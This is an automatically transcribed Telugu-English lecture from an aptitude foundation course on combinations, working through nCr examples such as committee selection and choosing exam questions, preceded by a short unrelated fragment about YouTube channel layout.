Layout, branding, and basic info for your channel. Let's first dive into the Layout tab. You can add a video. It's a different video to add a channel trail you can expect from your channel and a featured video. Next, a link case with videos popular up. Most subscriber will appear comments, banner image, and content. You add a video viewers and basic info, links in case you want people to YouTube Studio.
Hello everyone, good afternoon. Welcome to Aptitude Foundation course presented by APSSTC. So we were discussing permutations and combinations in the earlier classes. If I'm right, this is going to be the third class, and in the first class we discussed what are the counting principles, how it works, and how to solve the problems using basic principles of counting, correct? And in the second day we were discussing permutations, and today we are going to discuss combinations. So as I told you, this is a very huge topic which you need to understand with more clarity. So I'm doing it in 3 sessions. Now when it comes to combinations, we need to understand what is meant by combinations. So first, combinations ante enti anedi artham chesukovali. Now so first, principles ante enti ani chusam. Counting principles ela untundi, ela solve cheyali anedi manam chusam first day class lo, and second day permutations anedi chusam, basic questions and high level questions as well. And today the same thing, I'm going to start with the basic level combination questions, and at the same time I'm going to tell you restricted. There are certain questions where you have to understand whether that particular question belongs to permutation or combination. Check chesi meer solve cheyalsina conditions kuda untundi. Conditional combination kuda manam ee roju check chustam. Alright, now what is the difference between a permutation and the combination? So in the second day's class I've already mentioned, when it comes to permutation, order matters a lot, correct? And when it comes to combination, it is just no order, it is just the selection. Let me differentiate once again. So when I say this is permutation, and let's talk about another thing, which is combination. So permutation and combination, correct? Permutation, combination. Let's say for example, once again let us understand నేను మళ్ళీ permutation కి combination కి difference ఏంటి అంటే basic differences ఏంటి, ఎలా differentiate చేయాలి అనేది మీకు ఒకసారి చెప్తున్నాను. See, let's say for example we have 3 variables A, B, C, correct? So we have 3 variables, and in order to make it easier, let's take alright, let's take 3 variables which are A, B, C. Now what is meant by permutation and what is meant by combination? Very simple. So we discussed permutation is nothing but the arrangement. Remember, permutation anedi it is considered as an arrangement. When it comes to combination, it is just a selection. Combination and it is just a selection. Remember, this is permutation means arrangement and combination ante selection. So arrangement ante enti, selection ante enti ante, it is so simple. For example, so A, B, C ani 3 elements unnai. Try to understand A, B, C ane 3 elements. So in such case, ee A, B, C lo nenu any 2 elements నేను తీసుకుంటున్నాను. ఓకే, ఎనీ 2. సో ఎనీ 2 ఎలిమెంట్స్ని తీసుకొని నేను అరేంజ్ చేయాలంటే ఎలా చేయొచ్చు? ఫర్ ఎగ్జాంపుల్, నేను ఏ, బి అనే 2 ఎలిమెంట్స్ తీసుకుంటున్నాను. Try to understand, out of this 3, I'm going to take only 2 elements which are A, B. When it comes to arrangement, it is so simple. So here permutations are always greater than combinations. Permutations are always greater than combinations. Now ఈ A, B ని నేను ఎలా అరేంజ్ చేయొచ్చు అంటే, first thing it is A, B, and second thing it is B, A. So when it comes to arrangement, remember, order you have to consider. When it comes to permutation or arrangement, order you have to consider, which is A, B, which is nothing but B, A, correct? Now when it comes to selection, when it comes to selection, combination, so ee particular 3 elements lo I'm going to select 2 elements. Try to understand, permutation lo నేను ఏం చేశానంటే I'm going to arrange 2 elements. So ఈ A, B ని నేను ఎలా అరేంజ్ చేయొచ్చు అంటే, ఫస్ట్ A and then B గా అరేంజ్ చేయొచ్చు, or else first B and then A గా అరేంజ్ చేయొచ్చు, correct? Now when it comes to combination, so out of these 3 elements which are A, B, C, I'm going to select. So I'm going to select and it is going to be A, B. That's it. See, I don't bother, order doesn't matter here. It is so simple. So 3 members ఉన్నారు, or else 3 variables ఉన్నాయి, A, B, C. ఇందులో నేను 2 variables ని సెలెక్ట్ చేసుకుంటున్నాను అంటే, I'm just going to select A and B. I'm not going to bother about how the way or in which order I'm going to choose or select this particular 2 elements. It is so simple. So మీరు చూసినట్లయితే 3 elements లో నేను ఎప్పుడైతే 2 elements తీసుకున్నానో నాకు ఎన్ని ఆర్డర్స్ వచ్చాయి? A, B and B, A. సో ఇక్కడ 2 arrangements వచ్చాయి. Try to understand, ఈ 2 elements ని నేను అరేంజ్ చేసేటప్పుడు నాకు 2 arrangements వచ్చాయి, కరెక్ట్? నా when it comes to same A, B అనేది నేను సెలక్షన్ తీసుకున్నప్పుడు నాకు ఒక సెలక్షన్ మాత్రమే వచ్చింది. సో permutations are always greater than combinations, and we all know that permutation మనం ఏం చేసాం? సో it's represented in P, and obviously it is permutation is equal to n factorial by n minus r factorial అనే ఫార్ములాని యూస్ చేసి మనం డిపెండెన్సీ ఉంటుంది. n factorial by n minus r factorial permutation formula. Let's say if combination it is so simple, it is like n factorial by n minus r factorial into
r factorial. We all know this, it's a very basic formula. Alright, now so ఇంతవరకు మనం చూస్ చేసుకున్న మనం సెలెక్ట్ చేసుకున్న ఫర్ ఎగ్జాంపుల్ మనకి ఏదైతే క్వశ్చన్స్లో ఉన్న ఎలిమెంట్స్ కానీ నంబర్స్ కానీ ఆల్ఫాబెట్స్ కానీ ఏదైతే వాటిని మనం ఇంతసేపు అరేంజ్ చేసి అవి ఎన్ని వేస్లో మనం అరేంజ్ చేయొచ్చు అనేది సెలెక్ట్ చూస్తూ ఉన్నాం. బట్ నా టుడే వీఆర్ గోయింగ్ టు డిస్కస్ అబౌట్ ద కాంబినేషన్ వేరస్ వీఆర్ నాట్ గోయింగ్ టు బాదర్ అబౌట్ ఇట్స్ అరేంజ్మెంట్, వీఆర్ జస్ట్ గోయింగ్ టు సెలెక్ట్. We are just going to choose the elements, that's it. So forget about this permutation for some time. We are just going to concentrate only on the combinations. Combination enti just selection. Alright, so nenu cheppanu kada, I have 3 elements with me. It is so simple. I have 3 elements with me which is nothing but A, B, C, and I'm going to select or I'm going to choose only 2 elements which are nothing but A, B. Alright, in such case in how many ways I can do that ante ఇట్స్ లైక్ ఏబి అని మాత్రమే తీసుకున్నప్పుడు ఒకటి వస్తుంది. ఇప్పుడు సి కూడా మీరు కన్సిడర్ చేసుకున్నట్లయితే లైక్ మల్టిపుల్స్ వస్తుంది. ఫర్ ఎగ్జాంపుల్ సో ఏబిని కన్సిడర్ చేసుకున్నాను కాబట్టి నేను ఒక సెలెక్షన్ అన్నాను, నేను సి కూడా కన్సిడర్ చేసుకుంటే ఏబి అని ఏసీ అని ఇలా మల్టిపుల్గా మారుతూ ఉంటుంది. కరెక్ట్. నౌ లెట్స్ సీ ద ఫస్ట్ క్వశ్చన్. If you see the first question here, it's going to be find the value of 8C3. Okay, I repeat, find the value of 8C3. So find the value of 8C3. So it's a combination, a basic question, whereas it's nothing but so NCT, it's like NCR is equal to n factorial by n minus r factorial into r factorial. Correct? NCR, n factorial by n minus r factorial into r factorial. Same thing here. So it's going to be 8 factorial by 8 minus 3 whole factorial into 3 factorial. So whereas 8 factorial by 5 factorial into 3 factorial. Now, so factorial ante enti? It's like a descending order multiplication. Antena? So same here. Now 8 factorial ela raskochu descending order lo multiply chestu velali. Correct? So it is 8 into 7 into 6 into 5 factorial raskochu descending order multiplication. Correct? Now e 5 factorial ila note chestunnu which is and 3 factorial. Now I can cancel this 5 factorial and here in the numerator. Now we are left with 8 into 7 into 6 by 3 factorial can be expanded which is 3 into 2. Hence this is so simple. So once again 2 ones and 2 threes, 3 gets cancelled which is 8 into 7 which is 56. So 8C3 is nothing but 56. I hope you understand this. I'll repeat this. 8C3 which is 8 factorial by NCR is equal to n factorial by n minus r factorial into r factorial. Avuna? So 8 factorial by 8 minus 3 factorial into 3 factorial. So which is 8 factorial by 5 factorial into 3 factorial by 8 into 7 next in the next line if you see 8 into 7 into 6 into 5 factorial by 5 factorial into 3 factorial, whereas it is 8 into 7 into 6 by 3 into 2 which is 56. And I hope this is easy for you. Let's see the next question. If you observe the next question, it is like if 13cx, I repeat, if 13cx, alright, if 13cx is equal to 13cy, am I correct? If 13cx is equal to 13cy and x naught is equal to y, I repeat, if 13cx is equal to 13cy and x naught is equal to y, what is the value of x plus y? Okay, come again. So see this, 13cx is equal to 13cy. So x naught is equal to y అనేది condition. Now x plus y enta. It is so simple and the combinations which you need to understand. Guys, 13cx is equal to 13cy అయితే మనకు 2 cases ఉండాలి. Okay, first case ఏంటి అంటే, so remember x is equal to y అన్న ఉండాలి. In the sense either x is equal to y or second ఏముండాలి అంటే remember x plus y is equal to 13 అన్న అవ్వాలి. I repeat, so ఈ నెంబర్ అంటే n ప్లేస్లో ఏముంటుంది 13. కరెక్ట్. సో ఇక్కడ రెండు ఛాన్సెస్ మీకు ఉంటుంది. సో ఎప్పుడైతే 13cx is equal to 13cy ఉంటుందో మీకు రెండు ఛాన్సెస్ ఉంటుంది. ఒకటి చూసినట్లయితే x is equal to y, ఇంకోటి చూసినట్లయితే x plus y is equal to 13. ఇప్పుడు మనకు క్వశ్చన్లో క్లియర్గా ఏమి ఇచ్చారంటే x not is equal to y అనేది ఆల్రెడీ మెన్షన్ చేశారు. కరెక్ట్. ఎక్స్క్యూజ్ మీ, x నాట్ ఇస్ ఈక్వల్ టు y అని ఇచ్చేసారు. ఇన్ ద సెన్స్ ఫస్ట్ ఆప్షన్ రావడానికి ఛాన్స్ లేదు. సో ఆబ్వియస్లీ యూ హ్యావ్ టు గో విత్ ద సెకండ్ ఆప్షన్ విచ్ ఇస్ x ప్లస్ y ఇస్ ఈక్వల్ టు 13.
x plus y is equal to 13. So 13cx, if 13cx is equal to 13cy, then and at the same time x naught is equal to y, x plus y is equal to nth ante so simple. You have only two options, either x is equal to y aina undali or x plus y is equal to 13 aina undali. So x is equal to y not possible kabatti answer is x plus y is equal to 13. Let's see the next question. How many different committees of 5 members may be formed from 6 gentlemen and 4 ladies? I'll repeat the questions again. How many different committees of 5 members may be formed from 6 gentlemen and 4 ladies? Please make a note of this question. So these are the basic questions. How many different committees of 5 members may be formed, 6 gentlemen and 4 ladies? Alright, if you observe, so we have 6 gentlemen and 4 ladies. Correct, we have 6 gentlemen and 4 ladies. So how many different committees of 5 members? Now, from this, we are going to form a committee. We are going to form a committee, and this committee has how many members? So which has 5 members. Okay, so which has 5 members. I repeat the question. So you have 6 gentlemen and 4 ladies with you, and you have to form a committee of 5 members. In how many ways it can be formed? In how many ways it can be formed? It is so simple. If you observe this, so 5 members kavali ante, let's sum up this. So we have 6 gentlemen and 4 ladies kada. Do we have any subcondition, a condition or subcondition here? We don't have any condition. Ante conditions enti anedi check cheyali first. So if you ask me what are those conditions, it is so simple. So ee committee form see 6 members, 6 male or 4 female icharu avuna. ఒక కమిటీ 5 మెంబర్స్ని ఫామ్ చేయండి ఇందులో నుండి చెప్పారు. ఫస్ట్ థింగ్ మీరు కండిషన్ చెక్ చేయాలి. కండిషన్ అంటే ఏంటంటే ఈ 5 మెంబర్స్లో ఫర్ ఎగ్జాంపుల్ పర్టికులర్గా ఇంతమంది లేడీస్, ఇంతమంది మేల్, ఇంతమంది ఫీమేల్ ఉండాలా అని ఏదైనా కండిషన్ ఉందా అని ఈ పర్టికులర్ క్వశ్చన్లో మీరు చెక్ చేసినట్లయితే వీ డోంట్ హ్యావ్ ఎనీ కండిషన్. ఇన్ ద సెన్స్ ఈ 5 మెంబర్స్ అందరూ మేల్ అవ్వచ్చు, లేదంటే దాంట్లో 4 ఫీమేల్స్ ఉండొచ్చు, లేదా ఎనీ కాంబినేషన్, వీ డోంట్ హ్యావ్ ఎనీ రిస్ట్రిక్షన్. హౌ ఎవర్ ద వే యూ వాంట్ యూ కెన్ ఫార్మ్. ఇన్ ద సెన్స్ మనకు ఎక్స్క్లూజివ్గా 2 మెంబర్స్ లేడీస్ ఉండాలి, 3 మెంబర్స్ లేడీస్ ఉండాలి, లేదు 4 మెంబర్స్ జెంట్స్ ఉండాలి, లేదు 2 మెంబర్స్ జెంట్స్ ఉండాలి, ఇలాంటి కండిషన్స్ ఎనీ లేని క్వశ్చన్. ఇన్ సచ్ కేస్ సో ఈ 6 జెంటిల్మెన్ని 4 లేడీస్ని నేను చేస్తున్నా అంటే టోటల్గా 10 మెంబర్స్ ఉన్నారు అని కన్సిడర్ చేసుకుంటున్నా. 10 మెంబర్స్ ఉన్నారు. ఎందుకంటే నేను సెలెక్ట్ చేయడంలో వీ డోంట్ హ్యావ్ ఎనీ జెండర్ డిస్క్రిమినేషన్ వెన్ ఇట్ కమ్స్ టు కమిటీ. నేను కమిటీ ఫామ్ చేసేటప్పుడు నాకు ఎటువంటి కండిషన్ లేదు. ఫర్ ఎగ్జాంపుల్ ఇది మీకు ఇంకా సింపుల్గా అర్థం కావాలి అంటే లెట్స్ సే మీ క్లాస్లో 6 బాయ్స్ అండ్ 4 గర్ల్స్ ఉన్నారని తీసుకోండి, ఇంకా ఈజీగా అర్థమవుతుంది. 6 బాయ్స్ అండ్ 4 గర్ల్స్ ఒక టీమ్ని ఫామ్ చేయాలి. సో ఆ టీంలో ఎంతమంది ఉండాలంటే 5 మెంబర్స్ ఉండాలి. సో వీ డోంట్ హ్యావ్ ఎనీ కండిషన్. ఇన్ ద సెన్స్ మనకి దీంట్లో ఇంతమంది బాయ్స్ ఉండాలి, ఇంతమంది గర్ల్స్ ఉండాలి, ఇలాంటి ఎక్స్క్లూజివ్ కండిషన్ ఏం లేదు. సింపుల్గా 5 మెంబర్స్ ఉన్న ఒక టీమ్ని ఫామ్ చేయండి అని చెప్పారు. అప్పుడు నేను చేస్తానంటే ఈ 6 బాయ్స్ 4 గర్ల్స్ అంటే విచ్ ఇస్ నథింగ్ బట్ 6 జెంటిల్మెన్ 4 లేడీస్ని కలిపి నేను 10 మెంబర్స్ ఉన్నారు అని చెప్పి కన్సిడర్ చేసుకుంటున్నాను ఓవరాల్గా. సో ఈ 10 మెంబర్స్ నుండి ఎంతమందిని సెలెక్ట్ చేయాలి? 5 మెంబర్స్ ఉన్న టీమ్ని సెలెక్ట్ చేయాలి. ఎన్ని వేస్లో అంటే ఇట్ ఇస్ సో సింపుల్. ఇట్స్ గోయింగ్ టు బి 10C5. దట్స్ ఇట్. ఇట్స్ గోయింగ్ టు బి 10C5. ఆల్రైట్. సో ఎగ్జామ్లో ఎలా రావచ్చు? టెస్ట్లో మీకు 10C5 అని ఇచ్చినా ఓకే, ఇట్స్ వెల్ అండ్ గుడ్. లేదు దీన్ని సాల్వ్ చేసి ఆన్సర్ తీసుకురావాలన్నా ఓకే, బట్ యూ హ్యావ్ టు గో త్రూ ద ఆప్షన్స్. సమ్ టైమ్స్ దీన్ని సాల్వ్ చేయకుండా 10C5 అలానే ఆన్సర్స్ ఇవ్వచ్చు. కొన్నిసార్లు దీన్ని సాల్వ్ చేసి నెంబర్స్లో అయినా ఆన్సర్స్ ఇవ్వచ్చు. ఇట్ ఈస్ బెటర్ ఇఫ్ యూ సాల్వ్ దిస్ యాజ్ వెల్. సో ఇట్స్ లైక్ 10 factorial by 10C5 is nothing but 10 factorial by 10 minus 5 factorial into 5 factorial. Alright, now it is going to be 10 factorial ఎలా రాసుకోవచ్చు? 10 factorial by, so once again 5 factorial into 5 factorial. Correct. Now so it's going to be, so నేను 10 factorial ఎలా రాసుకోవచ్చు? డిసెండింగ్ ఆర్డర్ మల్టిప్లికేషన్ కదా, which is nothing but 10 into 9 into, and this is 8 into 7 into 6 into 5 factorial అని నోట్ చేసుకొని, అండ్ ఈ 5 factorial అలానే నోట్ చేసుకుంటున్నాను, అండ్ దిస్ ఇస్ గోయింగ్ టు బి 5 factorial. సో ఒక 5 factorial ఈ 5 factorial ని క్యాన్సిల్ చేస్తే ఇంకా వీఆర్ లెఫ్ట్ విత్
10 into 9 into 8 into 7 into 6 by 5 factorial. So E 5 factorial cancel kabatti we are left with only 5 factorial, which can be written as 5 into 4 into 3 into 2 into 1. And now 5 2's 10, correct? Cancel. Now 3 ones 3 3's and 4 ones 4 twice. So we are left with 3 into 2 into 7 into 6, which means 6 into 7 into 6, which means 42, 6, 7, 6, 42 into 6. So 42 into 6 means chusnatlaithe it is so simple, 6 2s are 12 and 6 4s are 24, which is 252. So 252 ways lo manam we can form a committee, which means is 6 gentlemen and 4 ladies use chesi మనం ఒక 5 మెంబర్స్ ఉన్న ఒక టీమ్ని ఒక కమిటీని మనం ఫామ్ చేయాలి అంటే ఎనీ డిఫరెంట్ వేస్ చేయొచ్చు. ఇట్ ఈస్ సో సింపుల్, విచ్ ఇస్ 252 వేస్. లెట్స్ సీ ద నెక్స్ట్ క్వశ్చన్. If you observe, in a test paper there are 10 questions, totally 10 questions. In how many different ways you can choose 6 questions to answer? Alright, we have a question paper where you have 10 questions in it and you're going to choose only 6 questions to answer. You're not going to answer all the 10 questions. Okay, no need to understand what is the reason behind that, just try to get the answer. It is so simple. 10 questions మీ దగ్గర ఉన్నాయి, అందులో మీరు 6 questions మాత్రమే ఆన్సర్ చేయబోతున్నారు. సో ఇది టెక్నికల్గా ఏంటి అనేది ఒక్కసారి మీరు అండర్స్టాండ్ చేసుకొని కాంబినేషన్స్ చేయడం బెటర్. సో ఐమ్ జస్ట్ గోయింగ్ టు ఎక్స్ప్లెయిన్. డోంట్ డూ ఆల్ దీస్ థింగ్స్ ఇన్ ఎగ్జామినేషన్. ఇది మీ అండర్స్టాండింగ్కి మాత్రమే. లెట్స్ సే 1 2 3 4 5 6 7 8 9 10. So I have 10 questions. So question number 1 from question number 10. Now I'm going to choose only 6 questions to answer. I'm not going to, let's say idoka black box anukunte deentlo 1 2 3 4 5 6 ee 10 lo nenu 6 questions maatrame choose chesukuntunna. Now I can choose question number 1 to answer. Let's say I don't want question 2. Let's say question 3 answer chesna. Let's say I want question 4. Yes, question 4, and I'm going to answer question 5 as well. Question 5. Alright, I'm not going to answer question 6. I'm going to answer question 7. Okay, question 7. And I'm not answering 8. I'm not answering 9. I'm answering question 10. ఓకే, సో ర్యాండమ్గా నేను ఇక్కడ మీకు ఏం చేశానంటే 10 క్వశ్చన్స్ తీసుకొని దాంట్లో ఈ 6 క్వశ్చన్స్ మాత్రమే నేను ఆన్సర్ చేశాను చెప్పి. ఇది జస్ట్ ర్యాండమ్. ఓకే, నేను ఒక ర్యాండమ్గా ఇలా నేను ఈ 6 క్వశ్చన్స్ని ఆన్సర్ చేస్తాను చెప్పాను కదా. సో ఇన్ సచ్ కేస్ ఈ 10 క్వశ్చన్స్ ఉంటే దీంట్లో 6 మాత్రమే నేను ఆన్సర్ చేయాలనుకున్నప్పుడు ఇలాంటి ఎన్ని డిఫరెంట్ వేస్లో నేను ఆన్సర్ చేయొచ్చు అనేది ఇక్కడ క్వశ్చన్. బట్ మేక్ షూర్ వీఆర్ నాట్ గోయింగ్ టు ఫాలో ఎనీ పర్టికులర్ ఆర్డర్. దిస్ క్వశ్చన్ డజంట్ కమ్ అండర్ permutations. This is completely combinations. So in how many ways I'm going to select? Alright, I'm not going to arrange. It is so simple. See here it is like we have 10 questions and probably we are going to answer only 6 questions. So obviously it is 10 C 6. If you ask me how it works, it is so simple. So 10 factorial by 10 minus 6 factorial by 10 minus 6 factorial into 6 factorial, which means 10 factorial by 4 factorial into 6 factorial. Now which means 10 into descending order multiplication, 10 into and 8 into 7 into 6 into 5 into let's say I'm going to stop with 6 just because we have 6 factorial and 4 factorial into 6 factorial. Now it is so simple. 6 factorial and 6 factorial I'm going to cancel and we are left with 10 into 9 into 8 into 7 by 4 into 3 into 2. Okay, now so 4 2 8, correct. 4 2s are 8 obviously, and 3 1s 3 3s. So we are left with 10 into 3 into 7, which means 30 into 7, which means 210. So in the sense, so this can be done in 210 different ways. 210 different ways. So ఇలాంటి ఎన్ని డిఫరెంట్ కాంబినేషన్స్ నేను చూస్ చేసుకోవచ్చు అంటే క్వశ్చన్ 1, క్వశ్చన్ 2, క్వశ్చన్ 3, లెట్స్ సే క్వశ్చన్ 4, 5 ఇలాంటి ఎన్ని డిఫరెంట్ కాంబినేషన్స్ అనేది నేను చేయొచ్చు అంటే 210 డిఫరెంట్ వేస్లో ఐ కెన్ సెలెక్ట్ ఆల్ దిస్ 10 క్వశ్చన్స్. నౌ లెట్స్ సీ ద నెక్స్ట్ క్వశ్చన్.
Okay, Mr. Ram has 5 friends. Okay, this is very important question which you need to understand. Mr. Ram has 5 questions. In how many ways he can invite one or more of them to a dinner? I repeat. So Mr. Ram has 5 friends. So he has 5 friends. Okay. So in such case, Mr. Ram has 5 friends. In such case, so he is going to invite them for a dinner. So let's say he is going to arrange a party or a dinner kind of thing. Now for that he has to invite his friends to his home. So ఇంటికి పిలుస్తున్నాడు తన ఫ్రెండ్స్ని, కరెక్టా? సో 5 మెంబర్స్ ఉన్నారు, ఎన్ని డిఫరెంట్ వేస్లో తను పిలవచ్చు అని చెప్పి. నా లెట్స్ సే రామ్ హ్యాస్ 5 ఫ్రెండ్స్, ఫస్ట్, సెకండ్, థర్డ్, ఫోర్త్, 5. Alright, now what are these అంటే try to understand. So Ram ki any friends మీరు చూసినట్టయితే Ram has 5 friends. Okay, now what are the chances అనేది మీరు చూసినట్లయితే ఇక్కడ, so in how many ways he can invite one or more of them to the dinner? So simple, in the sense he can invite only one friend, not first friend. This is not the order. We are not considered about, we are not bothered about the order here. No need to bother. This is the count. Okay, total count. Let's say రామ్ అనే తనకి 5 ఫ్రెండ్స్ ఉన్నారు అంటే తను ఒక్కరిని మాత్రమే పిలవడానికి ఛాన్స్ ఉంది, విచ్ ఇస్ ఓన్లీ 1 పర్సన్. టోటల్ కౌంట్ ఓన్లీ ఒకరిని మాత్రమే. సో ఇన్ సచ్ కేస్ ఇట్స్ గోయింగ్ టు బి 5C1. 5 మెంబర్స్ ఫ్రెండ్స్లో తను ఒకరిని మాత్రమే సెలెక్ట్ చేసుకుంటున్నాడు. ఆల్రైట్, లెట్స్ సే ఆర్ he can invite 2 people, any 2. He can invite any 2 people, or he can invite any 3 people, correct? Now he can invite any 4 people, or he can invite all the 5 people. He can invite all the 5 people. So it is going to be 531, 532, 5C3, 5C4, 535. Now let's see how this works. So what is 5C1? So 5C1 me try just, it's going to be 5, but I just want to understand how it works. Let's see, this is 5 factorial by 5 minus 1 factorial into 1 factorial. It is going to be, so if you understand, 5 by, correct, it is 5 minus 1, it is 4 factorial. 5 into 4 5 factorial అని రాసుకోవచ్చు, డిసెండింగ్ ఆర్డర్ మల్టిప్లికేషన్ కాబట్టి నేను 5 into 4 factorial రాస్తున్నాను by 4 factorial, ఎందుకంటే 5 minus 1 factorial. So 4 factorial gets cancelled. Here it is 5. Now see, or he can invite 5C2 ways, avuna, in the sense which is 5 factorial by 5 minus 2 factorial into, how much it is, 5 minus 2 factorial into 2 factorial, which means 5 factorial by 3 factorial into 2 factorial, which means దీన్ని ఎలా నోట్ చేయొచ్చు మీరు, 5 factorial అంటే 5 into 4 into 3 factorial రాయొచ్చా, and 3 factorial into 2 factorial. Now 3 factorial gets cancelled. 2 factorial and 2 and okay. So 2 ones lose and 5 twos are, how much it is, 10. Alright, 5, 10. Now let's see, here it is 5C3, which means 5 factorial by, so 5 minus 3 factorial into 3 factorial, which means 5 factorial by, understand, which is 2 factorial into 3 factorial. Now it is going to be 5 factorial by 2 factorial into 3 factorial. We know that it is 10. So here it is 10, here it is 10 ways, here it is 5 ways, correct? Now let's understand 5C4. 5C4 and it is so simple, 5 factorial by 5 factorial, 5 minus 4 factorial into 4 factorial. So which means 5 by, it's like 4 factorial, correct? So 4 factorial, which means 5 into 4 factorial by 4 factorial, which means 4 factorial gets cancelled and 5 is the remaining. This is 5 ways. So initial ga ఒకరినే పిలిస్తే 5 different ways లో పిలవచ్చు. లెట్స్ సే ఇద్దరిని పిలిస్తే 10 different ways లో పిలవచ్చు, ముగ్గురిని పిలిస్తే 10 different ways లో పిలవచ్చు, and then if he is going to invite 4 people, once again 5 different ways లో, and finally if he is going to invite all the 5, it's like 5 factorial by 5 minus 5 factorial into 5 factorial, and this is so simple. 0 factorial is 1, so 5 factorial by 5 factorial
which means it is one way. Andarni piliste there is only one way. Ante kada, so unnade 5 mandi and 5 mandini piliste it's going to be one way. So it is going to be 5, 10, 15 and plus 10, 25, 25 plus 5 it is 30 and 1, 31 ways. 31 ways. Correct. So 31 different ways లో తను ఒకరిని కానీ లేదు మోర్ దెన్ వన్ అంటే మాక్సిమం ఎన్ని ఉన్నాయో అన్ని మీరు సెలెక్ట్ చేసుకోవాలి. సో ఇక్కడ నేను ఎలా సాల్వ్ చేశాను మీరు చూసినట్లయితే ఒకరినే పిలిస్తే ఎన్ని డిఫరెంట్ వేస్లో పిలవచ్చు. ఇట్ ఇస్ గోయింగ్ టు బి 5C1 5 వేస్, ఇద్దరిని మాత్రమే పిలిస్తే 5C2 వేస్, అండ్ ముగ్గురిని మాత్రమే పిలిస్తే 5C3 వేస్, నలుగురిని మాత్రమే పిలిస్తే 5C4 వేస్, 5 మంది పిలిస్తే ఇట్స్ లైక్ 535 which is going to be 1. So all together 5, 10, 10, 5 and then 1 which is nothing but 31 ways low he can invite 5 of his friends, and remember only invite one or more than friends. Now so in order to solve this in an easier way, do we have a shortcut for this? Of course we can. Now try to understand. See ఈ స్టెప్ని గుర్తుపెట్టుకొని నా లెట్స్ సే ఇది ఈజీగా సాల్వ్ చేయాలంటే ఎలా ఈ క్యాలిక్యులేషన్స్ అన్ని లేకుండా అంటే, సో ఇనిషియలీ కన్సిడర్ దిస్ 5 ఆర్ ఇస్ obviously ప్లస్ ఇన్ పర్ముటేషన్ కాంబినేషన్ అవునా. సో ఇట్ ఈస్ అ ప్లస్ హియర్. సో ప్లస్ అంతే కదా, ఒకరిని ఆర్ ఇద్దరిని ఆర్ ముగ్గురిని ఆర్ నలుగురిని లేదా 5 మంది ఆర్. సో ఇట్స్ ఆల్ గోయింగ్ టు బి ప్లస్ 5C1 plus 5C2 plus 5C3 plus 5C4 plus 5C5. Now this is in terms of if you observe this, see let's say NC1 ఇది ఏ ఫామ్ లో ఉంది అని మీరు చూసినట్లయితే NC1 NC2 NC3 goes on NCN అనే ఫార్మాట్ లో ఉంటే we can simply make it as 2 power n minus 1. 2 power n minus 1. This is going to be shortcut. Now if you see 5C1, 5C2, 5C3, 5C4, 5C5, this is almost similar. Not almost, it is similar. Correct. In such case, so 2 power n. N is how much? N is 5. Correct. So n is 5. So 2 power 5 minus 1. 2 power 5 is how much? 32. So 32 minus 1 is how much? 31 ways. 31 ways. మీరు ఇలా సాల్వ్ చేసిన ఓకే. సో ఇన్స్టెడ్ ఆఫ్ ఒక్కొక్కటి సాల్వ్ చేయడానికి ఈ షార్ట్ కట్ మీరు గుర్తుపెట్టుకొని NC1 plus NC2 plus NC3 goes on NCN is equal to 2 power n minus 1 is going to be the shortcut formula, whereas this is going to be your answer. I hope you understand this. Let's go for the next question. If you see this, in how many ways can a committee of 6 members be formed from 7 men and 6 ladies consisting of 4 men and 2 ladies? So now you're going to form a committee. Guys, try to understand, you're going to form a committee. Alright, so in such committee, okay, here you have to understand one thing. So indaka nenu cheppinappudu starting lo initially started with, let's say we have, see before we solve this question you need to understand this. Okay, remember if I say let's take only one fellow, let's take only 2 people, forget about C. So initially I started with C as well, so it once again it makes our complication calculation bit more complex. Let's take A and B. A and B మాత్రమే ఉన్నారు అనుకుంటే, so as I told you our permutations are always greater than combinations. కరెక్టా? సో ఇలాంటి క్వశ్చన్ సాల్వ్ చేసేటప్పుడు దీంట్లో మీకు క్లారిటీ ఉండాలి. సో A and B, let's say క్యాపిటల్ A and B లో నేను ఎక్స్ప్లెయిన్ చేస్తాను. ఓకే, A and B ఇద్దరు ఉన్నారు, 2 ఎలిమెంట్స్. ఓకే, ఈ 2 ఎలిమెంట్స్ అయితే if I'm going to do the arrangement then it is going to be AB BA. Avuna, if I'm going to choose, this is permutation which means arrangement. If I'm going to take the combination then it is going to be selection just only AB ante. So nenu okasari veelliddari select cheskuntanu. So it is going to be 2 times and it is going to be 1 time. Now we are going to arrange here, that's why order AB and BA అని వచ్చింది. Here we are not going to arrange them, we are just going to choose them. Here ఇలాంటి క్వశ్చన్స్ కూడా మీరు చూసినట్లయితే ఈజీగా ఐడెంటిఫై చేయడానికి, whereas క్వశ్చన్లో అరేంజ్ చేయబోతున్నామా జస్ట్ చూస్ చేయబోతున్నామా అనేది యూ హ్యావ్ టు అండర్స్టాండ్. ఆల్రైట్, నౌ ఇఫ్ యూ సీ ద క్వశ్చన్ హియర్, in how many ways a committee of 6 members can be formed in the sense arrangement అని కాదు. ట్రై టు అండర్స్టాండ్, మీకు పర్ముటేషన్లో కాంబినేషన్ రెండిట్లోనూ ఫార్మ్డ్ అనే వస్తుంది. ఇఫ్ మీరు పర్ముటేషన్లో ఒక క్వశ్చన్ మీరు చూసినట్లయితే in how many 3-digit numbers can be formed using the digits అని వస్తుంది. ఫార్మ్డ్ అనేది కామన్ వర్డ్, బట్ బియాండ్ దట్ క్వశ్చన్ కొంచెం మీరు ఆలోచించినట్లయితే ఇట్ ఈస్ సో సింపుల్. కమిటీలో కొంతమంది టోటల్గా ఉంటే వాళ్ళని మనం ఒక కమిటీ ఫామ్ చేస్తున్నాం, అంతేగాని వాళ్ళని మనం అరేంజ్ చేయట్లేదు.
